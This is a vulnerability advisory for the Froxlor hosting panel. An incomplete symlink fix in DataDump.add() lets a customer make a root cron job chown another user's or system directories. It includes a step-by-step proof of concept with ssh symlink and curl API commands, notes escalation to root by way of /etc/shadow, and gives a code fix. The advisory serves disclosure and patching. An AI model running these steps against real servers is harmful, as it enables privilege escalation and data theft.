Summary

DataDump.add() constructs the export destination path from user-supplied input without passing the $fixed_homedir parameter to FileDir::makeCorrectDir(), bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes chown -R on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.

Details

The vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to FileDir::makeCorrectDir() via a $fixed_homedir parameter. When provided, it walks each path component checking for symlinks that escape the customer's home directory (lines 134-157 of lib/Froxlor/FileDir.php).

Every customer-facing API command that builds a path from user input passes this parameter:

// DirProtections.php:87
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// DirOptions.php:96
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// Ftps.php:178
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// SubDomains.php:585
return FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

But DataDump.add() was missed:

// DataDump.php:88 — NO $fixed_homedir parameter
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

The path flows unvalidated into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133):

Cronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);

When ExportCron::handle() runs as root, it executes at lib/Froxlor/Cron/System/ExportCron.php:232:

FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));

The chown -R command follows symlinks in its target argument. If $data['destdir'] resolves through a symlink to an arbitrary directory, the attacker's UID/GID is applied recursively to that directory and all its contents.

The Validate::validate() call on line 86 uses an empty pattern, which falls back to /^[^\r\n\t\f\0]*$/D — this only strips control characters and does not prevent symlink names. makeSecurePath() strips shell metacharacters and .. traversal but does not check for symlinks.

PoC

Prerequisites:

• system.exportenabled = 1 (admin setting)
• Customer account with API key and FTP/SSH access

# Step 1: Create a symlink inside the customer's docroot pointing to a victim directory
# (customer has FTP/SSH access to their own docroot)
ssh customer@server 'ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal'

# Step 2: Schedule data export via API with path pointing to the symlink
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \
  https://panel.example.com/api.php

# Expected response: 200 OK with task_data including destdir

# Step 3: Wait for ExportCron to run (hourly cron as root)
# The cron executes:
#   mkdir -p '/var/customers/webs/attacker_customer/steal/'       (follows symlink, dir exists)
#   tar cfz ... -C /var/customers/webs/attacker_customer/ .       (tars attacker's web data)
#   chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/.tmp/'
#   mv export.tar.gz '/var/customers/webs/attacker_customer/steal/'
#   chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/'
#
# The final chown resolves the symlink and recursively chowns
# /var/customers/webs/victim_customer/ to the attacker's UID/GID.

# Step 4: Attacker now owns all of victim's web files
ssh customer@server 'ls -la /var/customers/webs/victim_customer/'
# All files now owned by attacker_customer UID

# For system-level escalation, the symlink can target /etc:
# ln -s /etc /var/customers/webs/attacker_customer/steal
# After cron: attacker owns /etc/passwd, /etc/shadow → root shell

Impact

• Horizontal privilege escalation: A customer can take ownership of any other customer's web files, databases exports, and email data on the same server.
• Vertical privilege escalation: By targeting system directories (e.g., /etc), the customer can gain read/write access to /etc/passwd and /etc/shadow, enabling creation of a root account or password modification.
• Data breach: Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.
• Service disruption: Changing ownership of system directories can break system services.

The attack requires only a single API call and a symlink. The impact is delayed until the next cron run (typically hourly), making it harder to attribute.

Recommended Fix

Pass $customer['documentroot'] as the $fixed_homedir parameter in DataDump.add(), consistent with every other API command:

// lib/Froxlor/Api/Commands/DataDump.php, line 88
// Before (vulnerable):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

// After (fixed):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

Additionally, the ExportCron should use chown -h (no-dereference) or validate the destination path is not a symlink before executing chown -R:

// lib/Froxlor/Cron/System/ExportCron.php, line 232
// Add symlink check before chown
if (is_link(rtrim($data['destdir'], '/'))) {
    $cronlog->logAction(FroxlorLogger::CRON_ACTION, LOG_ERR, 'Export destination is a symlink, skipping chown for security: ' . $data['destdir']);
} else {
    FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));
}

References

• GHSA-75h4-c557-j89r
• https://nvd.nist.gov/vuln/detail/CVE-2026-41231
• froxlor/froxlor@2987b0e
• https://github.com/froxlor/froxlor/releases/tag/2.3.6